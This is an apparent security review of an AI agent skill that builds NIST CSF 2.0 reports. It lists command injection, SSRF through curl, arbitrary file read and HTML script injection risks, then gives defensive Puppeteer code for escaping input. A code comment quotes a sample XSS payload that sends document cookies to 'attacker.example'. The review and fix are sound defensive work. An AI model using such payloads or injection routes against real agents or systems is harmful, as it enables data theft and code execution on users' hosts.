This skill is highly vulnerable to command injection and
Claims to do
Prelude NIST CSF 2.0 Report Generator: You are an expert compliance analyst helping users build a comprehensive NIST Cybersecurity Framework 2.0 assessment report. You walk them through every subcategory of the framework, help them gather evidence, offer to pull data from their Prelude platform where applicable, and generate a professional branded PDF at the end.
Actually does
This skill uses various Prelude MCP tools (e.g., `get_account`, `scm_list_endpoints`, `get_activity`) to pull cybersecurity data from the user's Prelude platform. It collects manual input and third-party data from the user. Finally, it generates an HTML report and converts it to a PDF using `puppeteer`, `wkhtmltopdf`, or `weasyprint` by executing shell commands.
Shell command execution function detected
system (
The skill explicitly invokes external binaries (`npx`, `node`, `wkhtmltopdf`, `python3`) to convert the HTML report to PDF, and the evidence shows the input and output file paths written straight into the command strings (`wkhtmltopdf <html_file> <output.pdf>`, the `python3 -c` one-liner with the path inside the Python source). If the HTML content or those file paths can be influenced by user input, a name containing shell metacharacters (`;`, `$(…)`, quotes) terminates the intended command and appends another, which is a direct command injection giving arbitrary code execution on the host where the agent runs.
npx --yes puppeteer browsers install chrome...
node -e "..."
wkhtmltopdf <html_file> <output.pdf>
python3 -c "from weasyprint import HTML; HTML(filename='<html_file>').write_pdf('<output.pdf>')"
The agent offers to fetch data via `curl` from user-provided API endpoints. If the endpoint string is spliced into a shell command, an attacker controls the rest of the argument list: extra `curl` options (an `-o` that writes to an arbitrary path, for instance) or shell metacharacters give command execution. Even with a safely built argument list, the URL itself can point at internal services, cloud metadata endpoints or `file://` paths, which turns the agent into a Server-Side Request Forgery (SSRF) proxy.
API: 'If you have an API endpoint, I can fetch data via curl'
The agent offers to read and summarize a file at a user-provided path for CSV exports. Because the path comes from the conversation rather than from a fixed upload location, the agent can be pointed at any file its process can read, and the contents then flow into the summary or the report, so this is both an arbitrary file read and a possible exfiltration channel on the system where the agent is running.
CSV export: 'Export from [tool] and share the file path — I'll read and summarize it'
The skill's tool table lists a tool named `partner_block`, which suggests it can perform blocking actions on endpoints. Without a clear safeguard or explicit user confirmation before it is called, this tool could be triggered with malicious or mistaken parameters and cause denial of service or other unintended operational impact.
| Deploy detection | `partner_block` |
The agent is instructed to use Prelude tools like `get_activity` with views such as 'protected' and 'threats'. While this is part of the skill's legitimate function, it means the agent has access to potentially sensitive security activity data, raising a low risk of inadvertent exposure or mishandling during summarization or reporting.
`get_activity` with view="protected"
User-provided input (e.g., manual descriptions) is embedded into the HTML report, which is then loaded by Puppeteer from a `file://` URL and rendered in headless Chrome. Without HTML escaping, that input can carry markup and script: a `<script>` element or event handler runs inside the headless browser, and any `<img>`, `<link>`, `<iframe>` or `fetch` it references makes the renderer issue network requests, which can reach internal services and carry report contents out, and, depending on the renderer's file-access settings, read local files. The same concern applies to the `wkhtmltopdf` and `weasyprint` paths, since both fetch resources referenced from the HTML.
await page.goto('file://<absolute_path_to_html>', {waitUntil: 'networkidle0'});
https://mondoo.com/ai-agent-security/skills/github/preludeorg/prelude-claude-plugin/nist
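For the HTML injection finding above, the added example below (written for this review, not the skill's own report builder) escapes every user-supplied value before it is placed in the report and renders with scripting and outbound requests switched off: JavaScript is disabled on the page before the content is loaded, and a request interceptor aborts everything except inline `data:` URLs. The report layout, the organisation name and the subcategory notes in the tests are constructed for the example; the `renderPdf` function assumes the `puppeteer` package is installed.

```javascript
// Added example (not the skill's own code): escape user input before it is
// placed in the report, and render with scripting and network access off.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// One row of the assessment table. Every cell goes through escapeHtml, so a
// note such as '<img src=x onerror=fetch("https://attacker.example/?"+document.cookie)>'
// is displayed as text rather than parsed as markup.
function renderRow({ subcategory, status, notes }) {
  return `<tr><td>${escapeHtml(subcategory)}</td><td>${escapeHtml(status)}</td><td>${escapeHtml(notes)}</td></tr>`;
}

// Self-contained report: inline CSS, no external stylesheets, fonts or images.
function buildReport(orgName, rows) {
  return `<!doctype html>
<html><head><meta charset="utf-8"><title>${escapeHtml(orgName)} NIST CSF 2.0 Assessment</title>
<style>body{font-family:sans-serif}table{border-collapse:collapse}td,th{border:1px solid #999;padding:4px}</style>
</head><body>
<h1>${escapeHtml(orgName)} NIST CSF 2.0 Assessment</h1>
<table><tr><th>Subcategory</th><th>Status</th><th>Notes</th></tr>
${rows.map(renderRow).join('\n')}
</table></body></html>`;
}

// Request policy for the headless browser: a self-contained report needs no
// network, so only inline data: URLs (embedded images) are allowed through.
function shouldAllowRequest(url) {
  return url.startsWith('data:');
}

// Render with Puppeteer (loaded lazily so the functions above work without it).
// setContent replaces the write-to-disk-then-goto('file://...') step, so the
// report never has a file:// origin. JavaScript is disabled before the content
// is loaded, and the interceptor aborts anything the policy rejects.
async function renderPdf(html, outPath) {
  const puppeteer = require('puppeteer');
  const browser = await puppeteer.launch();
  try {
    const page = await browser.newPage();
    await page.setJavaScriptEnabled(false);
    await page.setRequestInterception(true);
    page.on('request', (req) => (shouldAllowRequest(req.url()) ? req.continue() : req.abort()));
    await page.setContent(html, { waitUntil: 'load' });
    await page.pdf({ path: outPath, format: 'A4', printBackground: true });
  } finally {
    await browser.close();
  }
}

module.exports = { escapeHtml, renderRow, buildReport, shouldAllowRequest, renderPdf };
```

Escaping is the control that matters for all three renderers; the interceptor and the JavaScript switch are Puppeteer-specific defence in depth, and if the report is ever handed to `wkhtmltopdf` or `weasyprint` instead, the equivalent is to keep the document self-contained so there is nothing for them to fetch.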